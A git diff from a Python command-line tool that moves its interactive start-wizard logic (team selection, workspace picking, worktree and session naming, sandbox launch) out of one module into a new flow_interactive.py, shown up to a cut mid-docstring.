subtitle=qr_subtitle, - context_label=qr_context_label, - standalone=standalone_mode, - effective_team=effective_team, - contexts=recent_contexts, - current_branch=current_branch, - ) - prompt = build_quick_resume_prompt(view_model=quick_resume_view) - answer = render_start_wizard_prompt( - prompt, - console=console, - allow_back=allow_back, - standalone=standalone_mode, - context_label=qr_context_label, - current_branch=current_branch, - effective_team=effective_team, - ) - - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.kind is StartWizardAnswerKind.BACK: - if allow_back: - return (BACK, None, None, None) - return (None, None, None, None) - - if answer.value is StartWizardAction.SWITCH_TEAM: - show_all_teams = False - state = apply_start_wizard_event(state, QuickResumeDismissed()) - # User explicitly requested team switch - go to TEAM_SELECTION - # regardless of team_selection_required config - state = StartWizardState( - step=StartWizardStep.TEAM_SELECTION, - context=StartWizardContext(team=None), # Clear for fresh selection - config=state.config, - ) - continue - - if answer.value is StartWizardAction.NEW_SESSION: - console.print() - state = apply_start_wizard_event(state, QuickResumeDismissed()) - continue - - if answer.value is StartWizardAction.TOGGLE_ALL_TEAMS: - if standalone_mode: - console.print("[dim]All teams view is unavailable in standalone mode[/dim]") - console.print() - continue - show_all_teams = not show_all_teams - continue - - selected_context = cast(WorkContext, answer.value) - if effective_team and selected_context.team and selected_context.team != effective_team: - console.print() - prompt = build_cross_team_resume_prompt(selected_context.team) - confirm_answer = render_start_wizard_prompt(prompt, console=console) - if not bool(confirm_answer.value): - continue - return ( - str(selected_context.worktree_path), - selected_context.team, - selected_context.last_session_id, - None, - ) - - if state.step is StartWizardStep.TEAM_SELECTION: - if standalone_mode: - if not standalone_override: - console.print("[dim]Running in standalone mode (no organization config)[/dim]") - console.print() - state = apply_start_wizard_event(state, TeamSelected(team=None)) - continue - - if not available_teams: - user_cfg = config.load_user_config() - org_source = user_cfg.get("organization_source", {}) - org_url = org_source.get("url", "unknown") - console.print() - console.print( - create_warning_panel( - "No Teams Configured", - f"Organization config from: {org_url}\n" - "No team profiles are defined in this organization.", - "Contact your admin to add profiles, or use: scc start --standalone", - ) - ) - console.print() - raise typer.Exit(EXIT_CONFIG) - - team_options = [ - TeamOption( - name=option.get("name", ""), - description=option.get("description", ""), - credential_status=option.get("credential_status"), - ) - for option in available_teams - ] - team_view = TeamSelectionViewModel( - title="Select Team", - subtitle=None, - current_team=str(selected_profile) if selected_profile else None, - options=team_options, - ) - prompt = build_team_selection_prompt(view_model=team_view) - answer = render_start_wizard_prompt( - prompt, - console=console, - available_teams=available_teams, - ) - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.value is StartWizardAction.SWITCH_TEAM: - state = apply_start_wizard_event(state, BackRequested()) - continue - - selected = cast(dict[str, Any], answer.value) - team = selected.get("name") - if team and team != selected_profile: - config.set_selected_profile(team) - selected_profile = team - effective_team = team - state = apply_start_wizard_event(state, TeamSelected(team=team)) - continue - - if state.step is StartWizardStep.WORKSPACE_SOURCE: - team_context_label = active_team_context - if state.context.team: - team_context_label = f"Team: {state.context.team}" - - team_config = ( - cfg.get("profiles", {}).get(state.context.team, {}) if state.context.team else {} - ) - team_repos = team_config.get("repositories", []) - - # Gather current directory context for UI to build options - # Command layer does I/O via service functions; application layer - # receives data flags; UI layer builds presentation options - cwd = Path.cwd() - cwd_context: CwdContext | None = None - if not is_suspicious_directory(cwd): - cwd_context = CwdContext( - path=str(cwd), - name=cwd.name or str(cwd), - is_git=git.is_git_repo(cwd), - has_project_markers=has_project_markers(cwd), - ) - - source_view = WorkspaceSourceViewModel( - title="Where is your project?", - subtitle="Pick a project source (press 't' to switch team)", - context_label=team_context_label, - standalone=standalone_mode, - allow_back=allow_back or (state.context.team is not None), - has_team_repos=bool(team_repos), - cwd_context=cwd_context, - options=[], - ) - prompt = build_workspace_source_prompt(view_model=source_view) - answer = render_start_wizard_prompt( - prompt, - console=console, - team_repos=team_repos, - allow_back=allow_back or (state.context.team is not None), - standalone=standalone_mode, - context_label=team_context_label, - effective_team=state.context.team or effective_team, - ) - - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.value is StartWizardAction.SWITCH_TEAM: - state = reset_for_team_switch(state) - state = set_team_context(state, team_override) - continue - - if answer.kind is StartWizardAnswerKind.BACK: - if state.context.team is not None: - state = apply_start_wizard_event(state, BackRequested()) - elif allow_back: - return (BACK, None, None, None) - else: - return (None, None, None, None) - continue - - source = cast(WorkspaceSource, answer.value) - if source is WorkspaceSource.CURRENT_DIR: - from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace - - context = resolve_workspace( - ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None) - ) - if context is not None: - workspace = str(context.workspace_root) - else: - workspace = str(Path.cwd()) - resume_state = _resolve_workspace_resume( - state, - workspace, - workspace_source=WorkspaceSource.CURRENT_DIR, - ) - if resume_state is None: - continue - if isinstance(resume_state, tuple): - return resume_state - state = resume_state - continue - - state = apply_start_wizard_event(state, WorkspaceSourceChosen(source=source)) - continue - - if state.step is StartWizardStep.WORKSPACE_PICKER: - team_context_label = active_team_context - if state.context.team: - team_context_label = f"Team: {state.context.team}" - - team_config = ( - cfg.get("profiles", {}).get(state.context.team, {}) if state.context.team else {} - ) - team_repos = team_config.get("repositories", []) - workspace_source = state.context.workspace_source - - if workspace_source is WorkspaceSource.RECENT: - recent = sessions.list_recent(limit=10, include_all=True) - summaries = [ - WorkspaceSummary( - label=_normalize_path(session.workspace), - description=session.last_used or "", - workspace=session.workspace, - ) - for session in recent - ] - recent_view_model = WorkspacePickerViewModel( - title="Recent Workspaces", - subtitle=None, - context_label=team_context_label, - standalone=standalone_mode, - allow_back=True, - options=summaries, - ) - prompt = build_workspace_picker_prompt(view_model=recent_view_model) - answer = render_start_wizard_prompt( - prompt, - console=console, - recent_sessions=recent, - allow_back=True, - standalone=standalone_mode, - context_label=team_context_label, - ) - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.value is StartWizardAction.SWITCH_TEAM: - state = reset_for_team_switch(state) - continue - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - workspace = cast(str, answer.value) - resume_state = _resolve_workspace_resume( - state, - workspace, - workspace_source=WorkspaceSource.RECENT, - ) - if resume_state is None: - continue - if isinstance(resume_state, tuple): - return resume_state - state = resume_state - continue - - if workspace_source is WorkspaceSource.TEAM_REPOS: - repo_view_model = TeamRepoPickerViewModel( - title="Team Repositories", - subtitle=None, - context_label=team_context_label, - standalone=standalone_mode, - allow_back=True, - workspace_base=workspace_base, - options=[], - ) - prompt = build_team_repo_prompt(view_model=repo_view_model) - answer = render_start_wizard_prompt( - prompt, - console=console, - team_repos=team_repos, - workspace_base=workspace_base, - allow_back=True, - standalone=standalone_mode, - context_label=team_context_label, - ) - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.value is StartWizardAction.SWITCH_TEAM: - state = reset_for_team_switch(state) - continue - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - workspace = cast(str, answer.value) - resume_state = _resolve_workspace_resume( - state, - workspace, - workspace_source=WorkspaceSource.TEAM_REPOS, - ) - if resume_state is None: - continue - if isinstance(resume_state, tuple): - return resume_state - state = resume_state - continue - - if workspace_source is WorkspaceSource.CUSTOM: - prompt = build_custom_workspace_prompt() - answer = render_start_wizard_prompt(prompt, console=console) - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - workspace = cast(str, answer.value) - resume_state = _resolve_workspace_resume( - state, - workspace, - workspace_source=WorkspaceSource.CUSTOM, - ) - if resume_state is None: - continue - if isinstance(resume_state, tuple): - return resume_state - state = resume_state - continue - - if workspace_source is WorkspaceSource.CLONE: - prompt = build_clone_repo_prompt() - answer = render_start_wizard_prompt( - prompt, - console=console, - workspace_base=workspace_base, - ) - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - workspace = cast(str, answer.value) - resume_state = _resolve_workspace_resume( - state, - workspace, - workspace_source=WorkspaceSource.CLONE, - ) - if resume_state is None: - continue - if isinstance(resume_state, tuple): - return resume_state - state = resume_state - continue - - if state.step is StartWizardStep.WORKTREE_DECISION: - prompt = build_confirm_worktree_prompt() - answer = render_start_wizard_prompt( - prompt, - console=console, - allow_back=True, - ) - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - - wants_worktree = cast(bool, answer.value) - worktree_name: str | None = None - if wants_worktree: - prompt = build_worktree_name_prompt() - answer = render_start_wizard_prompt(prompt, console=console) - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - worktree_name = cast(str, answer.value) - state = apply_start_wizard_event(state, WorktreeSelected(worktree_name=worktree_name)) - continue - - if state.step is StartWizardStep.SESSION_NAME: - prompt = build_session_name_prompt() - answer = render_start_wizard_prompt(prompt, console=console) - if answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if answer.kind is StartWizardAnswerKind.BACK: - state = apply_start_wizard_event(state, BackRequested()) - continue - session_name_value = cast(str | None, answer.value) - state = apply_start_wizard_event( - state, - SessionNameEntered(session_name=session_name_value), - ) - continue - - if state.step is StartWizardStep.BACK: - return (BACK, None, None, None) - if state.step is StartWizardStep.CANCELLED: - return (None, None, None, None) - - if state.context.workspace is None: - return (None, state.context.team, state.context.session_name, state.context.worktree_name) - return ( - cast(str, state.context.workspace), - state.context.team, - state.context.session_name, - state.context.worktree_name, - ) - - -# ───────────────────────────────────────────────────────────────────────────── -# Wizard entrypoint (dashboard + CLI) -# ───────────────────────────────────────────────────────────────────────────── - - -def run_start_wizard_flow( - *, skip_quick_resume: bool = False, allow_back: bool = False -) -> bool | None: - """Run the interactive start wizard and launch sandbox. - - This is the shared entrypoint for starting sessions from both the CLI - (scc start with no args) and the dashboard (Enter on empty containers). - - The function runs outside any Rich Live context to avoid nested Live - conflicts. It handles the complete flow: - 1. Run interactive wizard to get user selections - 2. If user cancels, return False/None - 3. Otherwise, validate and launch the sandbox - - Args: - skip_quick_resume: If True, bypass the Quick Resume picker and go - directly to project source selection. Used when starting from - dashboard empty states where "resume" doesn't make sense. - allow_back: If True, Esc returns BACK sentinel (for dashboard context). - If False, Esc returns None (for CLI context). - - Returns: - True if sandbox was launched successfully. - False if user pressed Esc to go back (only when allow_back=True). - None if user pressed q to quit or an error occurred. - """ - # Step 1: First-run detection - if setup.is_setup_needed(): - if not setup.maybe_run_setup(console): - return None # Error during setup - - cfg = config.load_user_config() - adapters = get_default_adapters() - - # Step 2: Run interactive wizard - # Note: standalone_override=False (default) is correct here - dashboard path - # doesn't have CLI flags, so we rely on config.is_standalone_mode() inside - # interactive_start() to detect standalone mode from user's config file. - workspace, team, session_name, worktree_name = interactive_start( - cfg, - skip_quick_resume=skip_quick_resume, - allow_back=allow_back, - git_client=adapters.git_client, - ) - - # Three-state return handling: - # - workspace is BACK → user pressed Esc (go back to dashboard) - # - workspace is None → user pressed q (quit app) - if workspace is BACK: - return False # Go back to dashboard - if workspace is None: - return None # Quit app - - workspace_value = cast(str, workspace) - - try: - with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): - adapters.sandbox_runtime.ensure_available() - workspace_path = validate_and_resolve_workspace(workspace_value) - workspace_path = prepare_workspace(workspace_path, worktree_name, install_deps=False) - assert workspace_path is not None - _configure_team_settings(team, cfg) - - standalone_mode = config.is_standalone_mode() or team is None - org_config = None - if team and not standalone_mode: - org_config = config.load_cached_org_config() - - start_dependencies = StartSessionDependencies( - filesystem=adapters.filesystem, - remote_fetcher=adapters.remote_fetcher, - clock=adapters.clock, - git_client=adapters.git_client, - agent_runner=adapters.agent_runner, - sandbox_runtime=adapters.sandbox_runtime, - resolve_effective_config=resolve_effective_config, - materialize_marketplace=materialize_marketplace, - ) - start_request = StartSessionRequest( - workspace_path=workspace_path, - workspace_arg=str(workspace_path), - entry_dir=workspace_path, - team=team, - session_name=session_name, - resume=False, - fresh=False, - offline=False, - standalone=standalone_mode, - dry_run=False, - allow_suspicious=False, - org_config=org_config, - ) - should_sync = team is not None and org_config is not None and not standalone_mode - if should_sync: - with Status( - "[cyan]Syncing marketplace settings...[/cyan]", - console=console, - spinner=Spinners.NETWORK, - ): - start_plan = prepare_launch_plan(start_request, dependencies=start_dependencies) - else: - start_plan = prepare_launch_plan(start_request, dependencies=start_dependencies) - - output_view_model = build_sync_output_view_model(start_plan) - render_launch_output(output_view_model, console=console, json_mode=False) - - resolver_result = start_plan.resolver_result - if resolver_result.is_mount_expanded: - console.print() - console.print( - create_info_panel( - "Worktree Detected", - f"Mounting parent directory for worktree support:\n{resolver_result.mount_root}", - "Both worktree and main repo will be accessible", - ) - ) - console.print() - current_branch = start_plan.current_branch - _record_session_and_context( - workspace_path, - team, - session_name, - current_branch, - ) - show_launch_panel( - workspace=workspace_path, - team=team, - session_name=session_name, - branch=current_branch, - is_resume=False, - ) - finalize_launch(start_plan, dependencies=start_dependencies) - return True - except Exception as e: - err_console.print(f"[red]Error launching sandbox: {e}[/red]") - return False + set_workspace_last_used_provider(workspace_path, resolved_provider) diff --git a/src/scc_cli/commands/launch/flow_interactive.py b/src/scc_cli/commands/launch/flow_interactive.py new file mode 100644 index 0000000..47139a0 --- /dev/null +++ b/src/scc_cli/commands/launch/flow_interactive.py @@ -0,0 +1,811 @@ +"""Interactive wizard flows for the launch command. + +Extracted from flow.py to reduce module size. Contains: +- interactive_start: guides user through interactive session setup +- run_start_wizard_flow: shared entrypoint for dashboard + CLI wizard +""" + +from __future__ import annotations + +from dataclasses import dataclass +from enum import Enum, auto +from pathlib import Path +from typing import Any, cast + +import typer +from rich.status import Status + +from scc_cli.commands.launch.wizard_resume import ( + handle_top_level_quick_resume, + resolve_workspace_resume, +) + +from ... import config, git, sessions, setup, teams +from ...application.launch import ( + BackRequested, + CwdContext, + QuickResumeDismissed, + SessionNameEntered, + StartWizardConfig, + StartWizardContext, + StartWizardState, + StartWizardStep, + TeamOption, + TeamRepoPickerViewModel, + TeamSelected, + TeamSelectionViewModel, + WorkspacePickerViewModel, + WorkspaceSource, + WorkspaceSourceChosen, + WorkspaceSourceViewModel, + WorkspaceSummary, + WorktreeSelected, + apply_start_wizard_event, + build_clone_repo_prompt, + build_confirm_worktree_prompt, + build_custom_workspace_prompt, + build_session_name_prompt, + build_team_repo_prompt, + build_team_selection_prompt, + build_workspace_picker_prompt, + build_workspace_source_prompt, + build_worktree_name_prompt, + finalize_launch, + initialize_start_wizard, +) +from ...application.start_session import StartSessionRequest +from ...bootstrap import get_default_adapters +from ...cli_common import console, err_console +from ...core.exit_codes import EXIT_CONFIG +from ...core.provider_resolution import get_provider_display_name +from ...panels import create_info_panel, create_warning_panel +from ...ports.config_models import NormalizedOrgConfig +from ...ports.git_client import GitClient +from ...presentation.launch_presenter import build_sync_output_view_model, render_launch_output +from ...services.workspace import has_project_markers, is_suspicious_directory +from ...theme import Colors, Spinners, get_brand_header +from ...ui.chrome import render_with_layout +from ...ui.keys import _BackSentinel +from ...ui.wizard import ( + BACK, + StartWizardAction, + StartWizardAnswerKind, + _normalize_path, + render_start_wizard_prompt, +) +from ...workspace_local_config import set_workspace_last_used_provider +from .conflict_resolution import LaunchConflictDecision, resolve_launch_conflict +from .dependencies import prepare_live_start_plan +from .flow_session import _record_session_and_context +from .flow_types import ( + WizardResumeContext, + reset_for_team_switch, + set_team_context, +) +from .preflight import collect_launch_readiness, ensure_launch_ready, resolve_launch_provider +from .render import show_auth_bootstrap_panel, show_launch_panel +from .team_settings import _configure_team_settings +from .workspace import prepare_workspace, validate_and_resolve_workspace + +_PickerContinue = tuple[StartWizardState, bool] +_PickerExit = tuple[str | _BackSentinel | None, str | None, str | None, str | None] + + +class StartWizardFlowDecision(Enum): + """Structured outcomes from the interactive start wizard.""" + + LAUNCHED = auto() + BACK = auto() + QUIT = auto() + CANCELLED = auto() + KEPT_EXISTING = auto() + FAILED = auto() + + +@dataclass(frozen=True) +class StartWizardFlowResult: + """Result returned from ``run_start_wizard_flow``.""" + + decision: StartWizardFlowDecision + message: str | None = None + + +def _handle_workspace_source( + *, + state: StartWizardState, + cfg: dict[str, Any], + active_team_context: str, + standalone_mode: bool, + allow_back: bool, + effective_team: str | None, + team_override: str | None, + active_team_label: str, + current_branch: str | None, + show_all_teams: bool, +) -> _PickerContinue | _PickerExit: + """Handle workspace source selection step.""" + team_context_label = active_team_context + if state.context.team: + team_context_label = f"Team: {state.context.team}" + + team_config = cfg.get("profiles", {}).get(state.context.team, {}) if state.context.team else {} + team_repos = team_config.get("repositories", []) + + cwd = Path.cwd() + cwd_context: CwdContext | None = None + if not is_suspicious_directory(cwd): + cwd_context = CwdContext( + path=str(cwd), + name=cwd.name or str(cwd), + is_git=git.is_git_repo(cwd), + has_project_markers=has_project_markers(cwd), + ) + + source_view = WorkspaceSourceViewModel( + title="Where is your project?", + subtitle="Pick a project source (press 't' to switch team)", + context_label=team_context_label, + standalone=standalone_mode, + allow_back=allow_back or (state.context.team is not None), + has_team_repos=bool(team_repos), + cwd_context=cwd_context, + options=[], + ) + prompt = build_workspace_source_prompt(view_model=source_view) + answer = render_start_wizard_prompt( + prompt, + console=console, + team_repos=team_repos, + allow_back=allow_back or (state.context.team is not None), + standalone=standalone_mode, + context_label=team_context_label, + effective_team=state.context.team or effective_team, + ) + + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.value is StartWizardAction.SWITCH_TEAM: + new_state = reset_for_team_switch(state) + new_state = set_team_context(new_state, team_override) + return (new_state, show_all_teams) + + if answer.kind is StartWizardAnswerKind.BACK: + if state.context.team is not None: + return (apply_start_wizard_event(state, BackRequested()), show_all_teams) + elif allow_back: + return (BACK, None, None, None) + else: + return (None, None, None, None) + + source = cast(WorkspaceSource, answer.value) + if source is WorkspaceSource.CURRENT_DIR: + from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace + + context = resolve_workspace(ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None)) + if context is not None: + workspace = str(context.workspace_root) + else: + workspace = str(Path.cwd()) + resume_ctx = WizardResumeContext( + standalone_mode=standalone_mode, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=active_team_label, + active_team_context=active_team_context, + current_branch=current_branch, + ) + resume_state, show_all_teams = resolve_workspace_resume( + state, + workspace, + workspace_source=WorkspaceSource.CURRENT_DIR, + render_context=resume_ctx, + show_all_teams=show_all_teams, + ) + if resume_state is None: + return (state, show_all_teams) + if isinstance(resume_state, tuple): + return resume_state + return (resume_state, show_all_teams) + + return (apply_start_wizard_event(state, WorkspaceSourceChosen(source=source)), show_all_teams) + + +def _handle_workspace_picker( + *, + state: StartWizardState, + cfg: dict[str, Any], + active_team_context: str, + standalone_mode: bool, + workspace_base: str, + allow_back: bool, + effective_team: str | None, + team_override: str | None, + active_team_label: str, + current_branch: str | None, + show_all_teams: bool, +) -> _PickerContinue | _PickerExit: + """Handle workspace picker step. + + Returns either: + - (_PickerContinue) (new_state, show_all_teams) — loop continues + - (_PickerExit) a terminal 4-tuple — caller returns it directly + """ + team_context_label = active_team_context + if state.context.team: + team_context_label = f"Team: {state.context.team}" + + team_config = cfg.get("profiles", {}).get(state.context.team, {}) if state.context.team else {} + team_repos = team_config.get("repositories", []) + workspace_source = state.context.workspace_source + + resume_ctx = WizardResumeContext( + standalone_mode=standalone_mode, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=active_team_label, + active_team_context=active_team_context, + current_branch=current_branch, + ) + + if workspace_source is WorkspaceSource.RECENT: + recent = sessions.list_recent(limit=10, include_all=True) + summaries = [ + WorkspaceSummary( + label=_normalize_path(session.workspace), + description=session.last_used or "", + workspace=session.workspace, + ) + for session in recent + ] + recent_view_model = WorkspacePickerViewModel( + title="Recent Workspaces", + subtitle=None, + context_label=team_context_label, + standalone=standalone_mode, + allow_back=True, + options=summaries, + ) + prompt = build_workspace_picker_prompt(view_model=recent_view_model) + answer = render_start_wizard_prompt( + prompt, + console=console, + recent_sessions=recent, + allow_back=True, + standalone=standalone_mode, + context_label=team_context_label, + ) + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.value is StartWizardAction.SWITCH_TEAM: + return (reset_for_team_switch(state), show_all_teams) + if answer.kind is StartWizardAnswerKind.BACK: + return (apply_start_wizard_event(state, BackRequested()), show_all_teams) + workspace = cast(str, answer.value) + + elif workspace_source is WorkspaceSource.TEAM_REPOS: + repo_view_model = TeamRepoPickerViewModel( + title="Team Repositories", + subtitle=None, + context_label=team_context_label, + standalone=standalone_mode, + allow_back=True, + workspace_base=workspace_base, + options=[], + ) + prompt = build_team_repo_prompt(view_model=repo_view_model) + answer = render_start_wizard_prompt( + prompt, + console=console, + team_repos=team_repos, + workspace_base=workspace_base, + allow_back=True, + standalone=standalone_mode, + context_label=team_context_label, + ) + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.value is StartWizardAction.SWITCH_TEAM: + return (reset_for_team_switch(state), show_all_teams) + if answer.kind is StartWizardAnswerKind.BACK: + return (apply_start_wizard_event(state, BackRequested()), show_all_teams) + workspace = cast(str, answer.value) + + elif workspace_source is WorkspaceSource.CUSTOM: + prompt = build_custom_workspace_prompt() + answer = render_start_wizard_prompt(prompt, console=console) + if answer.kind is StartWizardAnswerKind.BACK: + return (apply_start_wizard_event(state, BackRequested()), show_all_teams) + workspace = cast(str, answer.value) + + elif workspace_source is WorkspaceSource.CLONE: + prompt = build_clone_repo_prompt() + answer = render_start_wizard_prompt( + prompt, + console=console, + workspace_base=workspace_base, + ) + if answer.kind is StartWizardAnswerKind.BACK: + return (apply_start_wizard_event(state, BackRequested()), show_all_teams) + workspace = cast(str, answer.value) + + else: + return (state, show_all_teams) + + resume_state, show_all_teams = resolve_workspace_resume( + state, + workspace, + workspace_source=workspace_source or WorkspaceSource.CUSTOM, + render_context=resume_ctx, + show_all_teams=show_all_teams, + ) + if resume_state is None: + # resolve_workspace_resume returned None → loop again with unchanged state + return (state, show_all_teams) + if isinstance(resume_state, tuple): + # Terminal exit from wizard — propagate the 4-tuple result + return resume_state + return (resume_state, show_all_teams) + + +def interactive_start( + cfg: dict[str, Any], + *, + skip_quick_resume: bool = False, + allow_back: bool = False, + standalone_override: bool = False, + team_override: str | None = None, + git_client: GitClient | None = None, +) -> tuple[str | _BackSentinel | None, str | None, str | None, str | None]: + """Guide user through interactive session setup. + + Prompt for team selection, workspace source, optional worktree creation, + and session naming. + + The flow prioritizes quick resume by showing recent contexts first: + 0. Global Quick Resume - if contexts exist and skip_quick_resume=False + (filtered by effective_team: --team > selected_profile) + 1. Team selection - if no context selected (skipped in standalone mode) + 2. Workspace source selection + 2.5. Workspace-scoped Quick Resume - if contexts exist for selected workspace + 3. Worktree creation (optional) + 4. Session naming (optional) + + Navigation Semantics: + - 'q' anywhere: Quit wizard entirely (returns None) + - Esc at Step 0: BACK to dashboard (if allow_back) or skip to Step 1 + - Esc at Step 2: Go back to Step 1 (if team exists) or BACK to dashboard + - Esc at Step 2.5: Go back to Step 2 workspace picker + - 't' anywhere: Restart at Step 1 (team selection) + - 'a' at Quick Resume: Toggle between filtered and all-teams view + + Args: + cfg: Application configuration dictionary containing workspace_base + and other settings. + skip_quick_resume: If True, bypass the Quick Resume picker and go + directly to project source selection. + allow_back: If True, Esc at top level returns BACK sentinel instead + of None. + standalone_override: If True, force standalone mode regardless of config. + team_override: If provided, use this team for filtering instead of + selected_profile. + git_client: Optional git client for branch detection in Quick Resume. + + Returns: + Tuple of (workspace, team, session_name, worktree_name). + - Success: (path, team, session, worktree) with path always set + - Cancel: (None, None, None, None) if user pressed q + - Back: (BACK, None, None, None) if allow_back and user pressed Esc + """ + header = get_brand_header() + header_renderable = render_with_layout(console, header) + console.print(header_renderable, style=Colors.BRAND) + + # Determine mode: standalone vs organization + standalone_mode = standalone_override or config.is_standalone_mode() + + # Calculate effective_team: --team flag takes precedence over selected_profile + selected_profile = cfg.get("selected_profile") + effective_team: str | None = team_override or selected_profile + + # Build display label for UI + if standalone_mode: + active_team_label = "standalone" + elif team_override: + active_team_label = f"{team_override} (filtered)" + elif selected_profile: + active_team_label = selected_profile + else: + active_team_label = "none (press 't' to choose)" + active_team_context = f"Team: {active_team_label}" + + # Get available teams (from org config if available) + org_config = config.load_cached_org_config() + available_teams = teams.list_teams(org_config) + + if git_client is None: + adapters = get_default_adapters() + git_client = adapters.git_client + + try: + current_branch = git_client.get_current_branch(Path.cwd()) + except Exception: + current_branch = None + + has_active_team = team_override is not None or selected_profile is not None + wizard_config = StartWizardConfig( + quick_resume_enabled=not skip_quick_resume, + team_selection_required=not standalone_mode and not has_active_team, + allow_back=allow_back, + ) + state = initialize_start_wizard(wizard_config) + if team_override: + state = StartWizardState( + step=state.step, + context=StartWizardContext(team=team_override), + config=state.config, + ) + + show_all_teams = False + workspace_base = cfg.get("workspace_base", "~/projects") + + while state.step not in { + StartWizardStep.COMPLETE, + StartWizardStep.CANCELLED, + StartWizardStep.BACK, + }: + if state.step is StartWizardStep.QUICK_RESUME: + if not standalone_mode and not effective_team and available_teams: + console.print("[dim]Tip: Select a team first to see team-specific sessions[/dim]") + console.print() + state = apply_start_wizard_event(state, QuickResumeDismissed()) + continue + + resume_context = WizardResumeContext( + standalone_mode=standalone_mode, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=active_team_label, + active_team_context=active_team_context, + current_branch=current_branch, + ) + resolution, show_all_teams = handle_top_level_quick_resume( + state, + render_context=resume_context, + show_all_teams=show_all_teams, + ) + if isinstance(resolution, tuple): + return resolution + state = resolution + continue + + if state.step is StartWizardStep.TEAM_SELECTION: + if standalone_mode: + if not standalone_override: + console.print("[dim]Running in standalone mode (no organization config)[/dim]") + console.print() + state = apply_start_wizard_event(state, TeamSelected(team=None)) + continue + + if not available_teams: + user_cfg = config.load_user_config() + org_source = user_cfg.get("organization_source", {}) + org_url = org_source.get("url", "unknown") + console.print() + console.print( + create_warning_panel( + "No Teams Configured", + f"Organization config from: {org_url}\n" + "No team profiles are defined in this organization.", + "Contact your admin to add profiles, or use: scc start --standalone", + ) + ) + console.print() + raise typer.Exit(EXIT_CONFIG) + + team_options = [ + TeamOption( + name=option.get("name", ""), + description=option.get("description", ""), + credential_status=option.get("credential_status"), + ) + for option in available_teams + ] + team_view = TeamSelectionViewModel( + title="Select Team", + subtitle=None, + current_team=str(selected_profile) if selected_profile else None, + options=team_options, + ) + prompt = build_team_selection_prompt(view_model=team_view) + answer = render_start_wizard_prompt( + prompt, + console=console, + available_teams=available_teams, + ) + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.value is StartWizardAction.SWITCH_TEAM: + state = apply_start_wizard_event(state, BackRequested()) + continue + + selected = cast(dict[str, Any], answer.value) + team = selected.get("name") + if team and team != selected_profile: + config.set_selected_profile(team) + selected_profile = team + effective_team = team + state = apply_start_wizard_event(state, TeamSelected(team=team)) + continue + + if state.step is StartWizardStep.WORKSPACE_SOURCE: + source_result = _handle_workspace_source( + state=state, + cfg=cfg, + active_team_context=active_team_context, + standalone_mode=standalone_mode, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=active_team_label, + current_branch=current_branch, + show_all_teams=show_all_teams, + ) + if len(source_result) == 4: + return source_result + state, show_all_teams = source_result + continue + + if state.step is StartWizardStep.WORKSPACE_PICKER: + picker_result = _handle_workspace_picker( + state=state, + cfg=cfg, + active_team_context=active_team_context, + standalone_mode=standalone_mode, + workspace_base=workspace_base, + allow_back=allow_back, + effective_team=effective_team, + team_override=team_override, + active_team_label=active_team_label, + current_branch=current_branch, + show_all_teams=show_all_teams, + ) + # 4-tuple means exit; 2-tuple means continue looping + if len(picker_result) == 4: + return picker_result + state, show_all_teams = picker_result + continue + + if state.step is StartWizardStep.WORKTREE_DECISION: + prompt = build_confirm_worktree_prompt() + answer = render_start_wizard_prompt( + prompt, + console=console, + allow_back=True, + ) + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.kind is StartWizardAnswerKind.BACK: + state = apply_start_wizard_event(state, BackRequested()) + continue + + wants_worktree = cast(bool, answer.value) + worktree_name: str | None = None + if wants_worktree: + prompt = build_worktree_name_prompt() + answer = render_start_wizard_prompt(prompt, console=console) + if answer.kind is StartWizardAnswerKind.BACK: + state = apply_start_wizard_event(state, BackRequested()) + continue + worktree_name = cast(str, answer.value) + state = apply_start_wizard_event(state, WorktreeSelected(worktree_name=worktree_name)) + continue + + if state.step is StartWizardStep.SESSION_NAME: + prompt = build_session_name_prompt() + answer = render_start_wizard_prompt(prompt, console=console) + if answer.kind is StartWizardAnswerKind.CANCELLED: + return (None, None, None, None) + if answer.kind is StartWizardAnswerKind.BACK: + state = apply_start_wizard_event(state, BackRequested()) + continue + session_name_value = cast(str | None, answer.value) + state = apply_start_wizard_event( + state, + SessionNameEntered(session_name=session_name_value), + ) + continue + + if state.step is StartWizardStep.BACK: + return (BACK, None, None, None) + if state.step is StartWizardStep.CANCELLED: + return (None, None, None, None) + + if state.context.workspace is None: + return (None, state.context.team, state.context.session_name, state.context.worktree_name) + return ( + cast(str, state.context.workspace), + state.context.team, + state.context.session_name, + state.context.worktree_name, + ) + + +def run_start_wizard_flow( + *, skip_quick_resume: bool = False, allow_back: bool = False +) -> StartWizardFlowResult: + """Run the interactive start wizard and launch sandbox. + + This is the shared entrypoint for starting 